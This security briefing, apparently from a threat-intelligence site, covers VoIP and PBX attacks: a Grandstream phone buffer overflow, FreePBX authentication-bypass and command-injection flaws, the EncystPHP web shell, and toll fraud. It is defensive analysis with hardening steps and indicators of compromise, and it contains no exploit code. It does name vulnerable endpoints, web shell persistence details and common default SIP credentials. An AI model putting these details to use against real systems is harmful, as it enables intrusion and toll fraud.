analyst @ nohacky :~/briefings $
cat / briefings / voip-pbx-exploitation-landscape.html
analyst@nohacky:~/briefings/voip-pbx-exploitation-landscape.html
reading mode 10 min read
category vuln
published March 2026
read_time 10 min

VoIP and PBX Exploitation: The Current Attack Landscape

VoIP phones and PBX servers sit at an uncomfortable intersection: they carry sensitive conversations, they're connected to both corporate networks and the public internet, and they're frequently left unpatched for years. The last several months have produced a cluster of serious vulnerabilities and active exploitation campaigns that make this a good time to examine what attackers are actually doing with this infrastructure.

Two distinct threads run through recent VoIP security incidents. The first is device-level exploitation — vulnerabilities in hardware endpoints like desk phones that allow unauthenticated attackers to execute code and intercept calls. The second is platform-level exploitation — attacks against PBX management software like FreePBX that let adversaries take over the telephony infrastructure entirely and monetize it through toll fraud or use it as a foothold for broader network access. Both threads have produced critical vulnerabilities with active exploitation in the past several months.

CVE-2026-2329: Unauthenticated RCE in Grandstream GXP1600 Phones

In February 2026, Rapid7 researcher Stephen Fewer disclosed a critical stack-based buffer overflow in the entire Grandstream GXP1600 series of VoIP desk phones. The vulnerability, tracked as CVE-2026-2329 with a CVSSv4 score of 9.3, allows an unauthenticated remote attacker to achieve root-level code execution on any affected device. All six models in the series are vulnerable: the GXP1610, GXP1615, GXP1620, GXP1625, GXP1628, and GXP1630.

The flaw originates in the device's web-based API service, accessible at the /cgi-bin/api.values.get endpoint, which is reachable in the default configuration without requiring credentials. The endpoint processes a colon-delimited request parameter to return configuration values like firmware version or device model. Due to improper bounds checking, a specially crafted value for this parameter can write past the boundary of a 64-byte stack buffer, overflowing into adjacent stack memory. An attacker who controls what gets written to that overflow can corrupt the stack and ultimately redirect execution — a classic but effective technique that Rapid7 demonstrated by building a full ROP (return-oriented programming) chain to execute arbitrary OS commands via the standard C library system() function.

critical

Rapid7 has released public Metasploit exploit modules for CVE-2026-2329, including a post-exploitation module that extracts stored SIP credentials from a compromised device. Any organization running unpatched GXP1600 phones with the management interface reachable — from the internet or from within an internal network — should treat this as immediately exploitable. Firmware version 1.0.7.81 or later is required to remediate.

What makes this more than a typical endpoint vulnerability is the post-exploitation capability. Once root access is established, an attacker can reconfigure the phone to register with a malicious SIP proxy rather than the organization's legitimate PBX. All calls through that device then route through attacker-controlled infrastructure — effectively wiretapping the endpoint. SIP credentials stored on the device are also extractable, and those credentials can be used to register additional extensions or make outbound calls through the organization's trunks.

The GXP1600 line is widely deployed in small offices and enterprise environments. These phones are typically treated as trusted corporate infrastructure, rarely scrutinized by endpoint security tooling, and often remain in service for years without firmware updates. Because the management API is enabled by default and the vulnerability requires no credentials, any device that is directly internet-exposed or reachable from a compromised network segment is at risk. Rapid7 noted that while exploitation is not trivial, the public availability of weaponized Metasploit modules meaningfully lowers the barrier for opportunistic attacks.

FreePBX Under Active Siege: Two CVEs, Hundreds of Compromises

While the Grandstream vulnerability targets individual endpoints, the attacks against FreePBX infrastructure over the past several months have been both broader in scope and more directly monetized. Two critical vulnerabilities in FreePBX — CVE-2025-57819 and CVE-2025-64328 — have been actively exploited by threat actors, with confirmed compromises numbering in the hundreds as of early 2026.

CVE-2025-57819: Authentication Bypass to RCE (CVSS 10.0)

CVE-2025-57819 carries a maximum severity CVSS score of 10.0. The vulnerability stems from insufficient sanitization of user-supplied input in FreePBX's commercial endpoint module, which allows unauthenticated access to the FreePBX administrator interface. Once inside, an attacker can chain this with a SQL injection flaw to achieve remote code execution on the underlying server. FreePBX versions 15, 16, and 17 are all affected.

Exploitation was observed in the wild before the patch was publicly available, with Sangoma tracing unauthorized access to systems going back to at least August 21, 2025 — specifically targeting internet-exposed installations without adequate IP filtering or access control lists. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2025-57819 to its Known Exploited Vulnerabilities catalog and required Federal Civilian Executive Branch agencies to remediate by September 19, 2025.

FreePBX (and other PBX platforms) have long been a favorite hunting ground for ransomware gangs, initial access brokers and fraud groups abusing premium billing. If you use FreePBX with an endpoint module, assume compromise. — watchTowr CEO Benjamin Harris

Forensic analysis by watchTowr Labs found that successful exploitation was used to drop web shells and a bash cleanup script designed to erase evidence of compromise. Indicators of compromise to check for include suspicious POST requests to modular.php in Apache logs, calls to extension 9998 in Asterisk CDRs, and unknown users in the ampusers database table.

CVE-2025-64328: Command Injection and the EncystPHP Campaign

The second major FreePBX vulnerability, CVE-2025-64328, is a post-authentication command injection flaw in the Endpoint Manager module's check_ssh_connect() function. Authenticated attackers can execute arbitrary shell commands as the asterisk user through this endpoint. While it requires authentication — a lower severity threshold than CVE-2025-57819 — threat actors have chained it with credential attacks or previously compromised accounts to escalate access.

A campaign exploiting CVE-2025-64328, active since at least December 2025, was attributed to INJ3CTOR3, a financially motivated group with a documented history of targeting VoIP infrastructure going back to 2020. The group's goal is consistent across campaigns: gain persistent access to PBX systems and generate revenue through unauthorized call generation and toll fraud. Their tool of choice in this campaign is a PHP web shell dubbed EncystPHP, which masquerades as a legitimate FreePBX file named ajax.php.

warning

EncystPHP implements a four-stage persistence mechanism using crontab entries that re-download the secondary dropper every minute and deploy additional web shells across multiple directories under /var/www/html/ — including digium_phones/, rest_phones/, phones/, and freepbxphones/. Simply removing the initial web shell is insufficient for remediation. Assume full rebuild from clean backup is required.

Once deployed, EncystPHP provides an interactive command interface with predefined functions for enumerating the file system, querying active Asterisk channels, listing SIP peers, and retrieving FreePBX and Elastix configuration files. It also modifies system configuration to ensure SSH port 22 remains open. The web shell authenticates operators via MD5-hashed passwords hardcoded into the shell. By February 2026, Shadowserver and Fortinet had confirmed over 900 unique FreePBX instances compromised by this campaign, with the largest concentrations in the United States, Brazil, Canada, Germany, and France.

The Toll Fraud Business Model

Understanding why VoIP and PBX infrastructure is such a persistent target requires understanding toll fraud as a business. The Communications Fraud Control Association estimates global telecom fraud losses exceed $38 billion annually, with PBX exploitation accounting for a substantial portion of that figure. When attackers compromise a PBX system, the immediate monetization path is simple: use the organization's SIP trunks to place high volumes of calls to international premium-rate numbers that generate per-minute revenue for the attacker, billed directly to the victim organization.

A compromised PBX can generate $10,000 to $100,000 or more in fraudulent call charges over a single weekend. The timing is not accidental — attackers specifically target Friday evening through Monday morning when IT staff are unavailable to respond. By Monday, the bill is already substantial and often non-reversible. Carriers generally hold the account holder liable for charges generated by their own SIP credentials, regardless of whether those credentials were stolen.

note

The standard attack sequence for toll fraud starts with automated SIP scanning tools — SIPVicious, Sippts, and similar utilities — probing IP ranges for services on port 5060. Upon finding a SIP service, these tools attempt credential brute-forcing using common defaults: 100/100, 1001/1001, admin/admin, extension numbers used as passwords, and voicemail PINs reused as SIP credentials. Weak or default credentials are typically cracked within minutes on internet-exposed systems.

Beyond immediate toll fraud, a compromised PBX offers additional value to attackers. SIP credentials extracted from the system can be sold to other actors. The server itself, typically well-connected with stable internet access, can serve as a pivot point into internal network segments. And because PBX systems often bridge otherwise segmented networks — routing calls between internal extensions and external trunks — they represent a natural lateral movement opportunity for actors with broader infrastructure goals.

Why VoIP Infrastructure Stays Vulnerable

Several structural factors keep VoIP and PBX systems persistently exposed. Hardware endpoints like the Grandstream GXP1600 series are deployed with a multi-year lifecycle in mind. Organizations purchase phones expecting them to remain in service for five to ten years, and firmware update processes are rarely as mature as patch management for servers or workstations. Many organizations have no automated mechanism to identify when new firmware is available for deployed VoIP hardware, and updating phone firmware often requires physical or network access to individual devices at scale.

On the software side, PBX platforms like FreePBX are frequently deployed by managed service providers or small IT teams who stand up a system and leave it running with minimal ongoing maintenance. Internet-exposed FreePBX installations without IP filtering or access control lists are common — this was explicitly cited as the attack vector for CVE-2025-57819. FreePBX's administrative interface is powerful by design, managing everything from SIP trunks and call routing to voicemail and dial plans, which makes it an attractive target precisely because a successful compromise delivers full control over the organization's telephony infrastructure.

The trusted-device problem compounds this. VoIP phones typically sit on the same network segments as other corporate devices. They appear in IP address space as known-good infrastructure. Endpoint security agents are not deployed on them. Network monitoring may not scrutinize their traffic with the same intensity applied to workstations. An attacker with a foothold on a compromised VoIP phone or PBX server is operating from a position that many security controls are not designed to detect or constrain.

Hardening Priorities for VoIP Infrastructure

  1. Patch firmware on hardware endpoints immediately. CVE-2026-2329 in the Grandstream GXP1600 series is remediated by firmware version 1.0.7.81. Public Metasploit modules are available, making exploitation straightforward for any attacker who can reach the management interface. If devices cannot be patched immediately, firewall access to the management port and restrict reachability to authorized management stations only.
  2. Restrict the FreePBX administrative interface to known IP ranges. Both CVE-2025-57819 and CVE-2025-64328 were exploited through internet-exposed FreePBX instances lacking IP filtering. The administrative interface should never be directly internet-accessible. If remote administration is required, require VPN authentication first.
  3. Audit for indicators of EncystPHP and related webshell compromise. For any FreePBX installation that was internet-exposed before patching CVE-2025-64328, check for unexpected PHP files in /var/www/html/admin/, /var/www/html/digium_phones/, /var/www/html/phones/, and related directories. Review crontab entries for unexpected entries. Verify no unknown users exist in the ampusers database. Review Asterisk CDRs for calls to extension 9998 or unexplained international call traffic.
  4. Enforce strong, unique SIP credentials on all extensions. Extension credentials should never match extension numbers, use default values, or reuse voicemail PINs. Automated SIP scanning tools will try these patterns within minutes of discovering an exposed SIP service. Implement account lockout or rate limiting on failed SIP registration attempts where the platform supports it.
  5. Monitor for anomalous call activity, particularly outside business hours. Toll fraud attacks concentrate on weekend and holiday periods when monitoring is reduced. Automated alerts on after-hours international dialing, high call volumes, or calls to unfamiliar country codes provide detection coverage where manual monitoring cannot. Set hard outbound call limits or block international dialing entirely for extensions where it is not a business requirement.
  6. Segment VoIP infrastructure from general corporate networks. Place VoIP phones and PBX servers in dedicated VLANs with firewall policies limiting communication to required SIP and RTP traffic. A compromised VoIP device should not have direct access to file servers, domain controllers, or other sensitive internal resources.
  7. Monitor VoIP device outbound connections. After CVE-2026-2329, a compromised Grandstream phone may attempt to register with an unexpected SIP server. Monitoring for outbound SIP REGISTER messages to IP addresses outside the organization's known SIP trunk providers can surface this quickly. Similarly, unexpected SSH connections from PBX servers should be treated as a red flag given EncystPHP's modification of SSH configuration.

Key Takeaways

  1. Two critical vulnerabilities in widely-deployed VoIP infrastructure are actively exploited right now. CVE-2026-2329 in Grandstream phones (CVSS 9.3) and CVE-2025-64328 in FreePBX, combined with the earlier CVE-2025-57819 (CVSS 10.0), represent a concentrated set of high-severity issues that have moved from disclosure to active exploitation quickly. Patching and mitigation cannot wait.
  2. Toll fraud provides attackers with immediate, direct monetization from a compromised PBX. Unlike data theft, which requires a downstream sale, unauthorized call generation starts generating revenue for attackers the moment they have SIP trunk access. Weekend attacks can produce five-figure losses before anyone notices. Financial exposure is real and immediate.
  3. VoIP hardware and PBX software share a structural patching problem. Multi-year device lifecycles, minimal update automation, and internet-exposed management interfaces create persistent attack surface. The same attack patterns — unauthenticated access to management endpoints, SIP credential brute-forcing, and web shell persistence — recur across campaigns because the conditions that enable them are rarely addressed at the root.
  4. A compromised PBX is not just a telephony problem — it's a network foothold. PBX servers bridge network segments, carry SIP credentials, and operate with elevated trust from surrounding infrastructure. Initial access through VoIP exploitation can enable lateral movement that extends well beyond the phone system.
  5. Detection for VoIP exploitation requires VoIP-specific monitoring. General endpoint security does not cover VoIP phones. PBX-specific indicators — CDR anomalies, unexpected SIP registrations, new administrative users, and unusual file system changes — require deliberate monitoring that many organizations have not implemented.

VoIP infrastructure rarely gets the security attention that servers, workstations, and network devices receive. The cluster of critical vulnerabilities and active campaigns from the past several months is a useful reminder that phones are networked computers with privileged access to both communications and internal network segments. The organizations that treat them as such — maintaining firmware, restricting management access, and monitoring call activity — are in a significantly stronger position than those that don't.

— end of briefing